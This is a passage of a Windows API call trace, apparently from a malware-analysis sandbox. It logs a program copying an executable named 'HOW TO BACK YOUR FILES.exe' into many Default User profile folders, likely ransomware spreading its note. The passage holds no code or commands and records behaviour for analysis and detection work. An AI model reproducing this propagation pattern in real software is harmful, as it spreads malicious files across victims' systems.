Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows media\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.594] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.595] GetLastError () returned 0x0 [0078.595] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.595] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.595] CloseHandle (hObject=0x118) returned 1 [0078.595] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.595] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a71db00, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a71db00, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.595] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.595] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.595] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0078.595] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0" [0078.595] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.595] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows media\\12.0\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.596] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.596] GetLastError () returned 0x0 [0078.596] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.596] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.596] CloseHandle (hObject=0x118) returned 1 [0078.596] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.596] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Media\\12.0\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x559cae60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x559cae60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.597] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.597] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.597] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0078.597] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail" [0078.597] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.597] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows mail\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.597] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.598] GetLastError () returned 0x0 [0078.598] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.598] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.598] CloseHandle (hObject=0x118) returned 1 [0078.598] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.598] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x574201c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x574201c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.598] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.598] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.598] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0078.598] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery" [0078.598] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.599] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows mail\\stationery\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.599] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.599] GetLastError () returned 0x0 [0078.599] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.599] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.599] CloseHandle (hObject=0x118) returned 1 [0078.599] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.600] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Stationery\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x578246e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x578246e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.600] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.600] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.600] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0078.600] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup" [0078.600] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.600] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows mail\\backup\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.601] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.601] GetLastError () returned 0x0 [0078.601] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.601] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.601] CloseHandle (hObject=0x118) returned 1 [0078.601] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.601] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4a89a8c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4a89a8c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.601] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.601] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.601] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0078.601] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new" [0078.602] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.602] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\windows mail\\backup\\new\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.602] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.602] GetLastError () returned 0x0 [0078.602] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.603] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.603] CloseHandle (hObject=0x118) returned 1 [0078.603] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.603] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Windows Mail\\Backup\\new\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x5840b4e0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x5840b4e0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.603] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.603] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.603] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player" [0078.603] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player" [0078.603] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.603] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\media player\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.604] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.604] GetLastError () returned 0x0 [0078.604] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.604] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.604] CloseHandle (hObject=0x118) returned 1 [0078.604] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.604] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aa17680, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aa17680, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.604] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.605] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.605] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0078.605] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists" [0078.605] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.605] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\media player\\sync playlists\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.605] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.605] GetLastError () returned 0x0 [0078.606] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.606] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.606] CloseHandle (hObject=0x118) returned 1 [0078.606] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.606] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aad5d60, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aad5d60, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.606] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.606] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.606] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.606] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US" [0078.606] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.606] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.607] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.607] GetLastError () returned 0x0 [0078.607] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.607] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.607] CloseHandle (hObject=0x118) returned 1 [0078.607] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0078.607] FindFirstFileW (in: lpFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\*", lpFindFileData=0x2e2e610 | out: lpFindFileData=0x2e2e610*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4aafbec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4aafbec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd0e8 [0078.608] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0078.608] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0078.608] lstrcpynW (in: lpString1=0x2e2e860, lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E", iMaxLength=260 | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.608] lstrcatW (in: lpString1="", lpString2="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" | out: lpString1="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E") returned="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E" [0078.608] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0078.608] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Documents and Settings\\Default User\\Local Settings\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\documents and settings\\default user\\local settings\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\how to back your files.exe"), bFailIfExists=1) returned 0 [0078.608] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x118 [0078.609] GetLastError () returned 0x0 [0078.609] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0078.609] ReadFile (in: hFile=0x118, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2e2e53c, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2e2e53c*=0x1dc00, lpOverlapped=0x0) returned 1 [0078.609] CloseHandle (hObject=0x118) returned 1 